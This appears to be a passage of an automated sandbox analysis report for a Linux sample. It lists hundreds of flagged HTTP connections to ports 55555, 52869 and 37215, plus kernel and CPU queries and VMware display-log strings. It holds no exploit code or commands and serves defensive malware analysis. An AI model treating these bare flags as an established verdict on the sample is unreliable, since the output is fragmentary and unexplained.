    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44450 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34220 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43006 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33992 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54926 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54302 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 54302
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56472 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44848 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33478 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41000 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 41000
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56830 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58976 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37706 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 37706
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48830 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 48830
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52452 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46776 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34728 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47084 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43446 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57450 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44830 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52576 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 52576
    Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 46582
    Source: unknownNetwork traffic detected: HTTP traffic on port 39328 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42794 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48806 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53170 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36954 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59204 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54428 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34018 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55118 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59500 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39910 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 59500
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 39910
    Source: unknownNetwork traffic detected: HTTP traffic on port 59672 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60054 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52658 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54894 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42232 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40308 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36450 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59318 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41280 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47862 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55064 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43070 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33114 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56496 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35412 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36176 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55510 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60928 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33232 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59842 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58536 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58054 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52394 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36414 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45636 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55700 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60612 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53156 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60186 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44790 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59542 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35434 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42688 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33770 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48556 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52722 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46778 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 46778
    Source: unknownNetwork traffic detected: HTTP traffic on port 57638 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 57638
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56244 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47782 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48416 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60432 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60432
    Source: unknownNetwork traffic detected: HTTP traffic on port 54998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37776 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55514 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55454 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 49552
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57526 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60374 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 57526
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56110 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48750 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55988 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40044 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40554 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55240 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33074 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49050 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48822 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41768 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42430 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36036 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38270 -> 55555
    Source: /usr/bin/pulseaudio (PID: 5713)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/lib/xorg/Xorg (PID: 5742)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/lib/xorg/Xorg (PID: 6258)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/lib/xorg/Xorg (PID: 6719)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /lib/systemd/systemd-resolved (PID: 5285)Queries kernel information via 'uname':
    Source: /usr/bin/pulseaudio (PID: 5713)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 5731)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-x-session (PID: 5738)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 5742)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 5858)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 6239)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6256)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 6258)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 6315)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 6709)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-x-session (PID: 6717)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 6719)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 6731)Queries kernel information via 'uname':
    Source: /usr/lib/gdm3/gdm-session-worker (PID: 7129)Queries kernel information via 'uname':
    Source: /lib/systemd/systemd-resolved (PID: 7143)Queries kernel information via 'uname':
    Source: /usr/lib/xorg/Xorg (PID: 5742)Truncated file: /var/log/Xorg.pid-5742.log
    Source: /usr/lib/xorg/Xorg (PID: 6258)Truncated file: /var/log/Xorg.pid-6258.log
    Source: /usr/lib/xorg/Xorg (PID: 6719)Truncated file: /var/log/Xorg.pid-6719.log
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.485] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.293] (**) vmware(0): Default mode "800x600": 40.0 MHz, 37.9 kHz, 60.3 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.748] (==) vmware(0): Will set up a driver mode with dimensions 800x600.
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.753] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse0)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.620] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.249] (II) vmware(0): Modeline "640x480"x72.8 31.50 640 664 704 832 480 489 492 520 -hsync -vsync (37.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.178] (II) vmware(0): Modeline "1152x864"x75.0 104.99 1152 1224 1352 1552 864 865 868 902 -hsync +vsync (67.6 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.379] (II) vmware(0): Modeline "720x400"x85.0 35.50 720 756 828 936 400 401 404 446 -hsync +vsync (37.9 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.978] (II) vmware(0): Not using default mode "640x400" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.658] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.266] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.465] (II) vmware(0): Not using default mode "1856x1392" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.500] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.621] (**) vmware(0): Default mode "1152x864": 143.5 MHz, 91.5 kHz, 100.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.662] (==) vmware(0): DPI set to (96, 96)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.404] (II) vmware(0): Not using default mode "1440x810" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.262] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.055] (II) vmware(0): Not using default mode "640x480" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.767] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.898] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.047] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.191] (**) vmware(0): Default mode "1152x864": 81.6 MHz, 53.7 kHz, 60.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.233] (II) vmware(0): Not using default mode "360x200" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.043] (II) vmware(0): Not using default mode "700x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 603.235] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/event3)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.197] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.118] (II) vmware(0): Modeline "vmwlegacy-default-800x600"x60.0 36.25 800 801 802 1002 600 601 602 603 (36.2 kHz ez)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.217] (**) vmware(0): Default mode "1024x768": 75.0 MHz, 56.5 kHz, 70.1 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.758] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.306] (**) vmware(0): Default mode "640x350": 31.5 MHz, 37.9 kHz, 85.1 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.229] (II) vmware(0): Modeline "864x486"x59.9 32.50 864 888 968 1072 486 489 494 506 -hsync +vsync (30.3 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 542.719] (==) Matched vmware as autoconfigured driver 0
    Source: Xorg.0.log.152.drBinary or memory string: [ 586.515] (WW) vmware(0): Disabling Render Acceleration.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.128] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.617] (II) vmware(0): Not using default mode "720x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.376] (II) event3 - VirtualPS/2 VMware VMMouse: device is a pointer
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.003] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.729] (II) vmware(0): Modeline "1152x864"x70.0 96.77 1152 1224 1344 1536 864 865 868 900 -hsync +vsync (63.0 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.281] (II) vmware(0): Not using default mode "416x312" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.677] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.207] (II) vmware(0): Modeline "800x600"x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync (37.9 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.154] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.311] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.484] (II) event3 - VirtualPS/2 VMware VMMouse: device removed
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.174] (**) vmware(0): Default mode "1152x864": 105.0 MHz, 67.6 kHz, 75.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.521] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.409] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.797] (II) event2 - VirtualPS/2 VMware VMMouse: device is a pointer
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.865] (**) vmware(0): Default mode "832x624": 57.3 MHz, 49.7 kHz, 74.6 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.944] (II) vmware(0): Not using default mode "512x384i" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.616] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.381] (II) vmware(0): Not using default mode "896x672" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.084] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.795] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.733] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.188] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.387] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.285] (**) vmware(0): Default mode "800x600": 50.0 MHz, 48.1 kHz, 72.2 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 457.807] (WW) vmware(0): Disabling RandR12+ support.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.720] (II) vmware(0): Not using default mode "1368x768" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.645] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.831] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.056] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.275] (II) vmware(0): Modeline "640x480"x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync (37.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.548] (--) vmware(0): w.red: 8
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.111] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.265] (II) vmware(0): Modeline "720x405"x59.5 22.50 720 744 808 896 405 408 413 422 -hsync +vsync (25.1 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.362] (II) vmware(0): Modeline "640x480"x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.826] (II) vmware(0): Not using default mode "1440x810" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.357] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.830] (II) vmware(0): Modeline "1024x768"x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.580] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.588] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.882] (**) vmware(0): Default mode "960x540": 40.8 MHz, 33.5 kHz, 59.6 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.710] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.932] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.197] (II) vmware(0): Modeline "800x600"x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync (48.1 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.759] (II) vmware(0): Not using default mode "720x405" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.498] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.144] (II) vmware(0): Modeline "1024x576"x59.9 46.50 1024 1064 1160 1296 576 579 584 599 -hsync +vsync (35.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.669] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.348] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.9 kHz, 72.8 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.870] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.301] (**) vmware(0): Default mode "800x600": 36.0 MHz, 35.2 kHz, 56.2 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.514] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.721] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.611] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.914] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.125] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.291] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.469] (**) vmware(0): Default mode "640x400": 31.5 MHz, 37.9 kHz, 85.1 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.333] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.081] (II) vmware(0): Modeline "vmwlegacy-default-800x600"x60.0 36.25 800 801 802 1002 600 601 602 603 (36.2 kHz ez)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.974] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
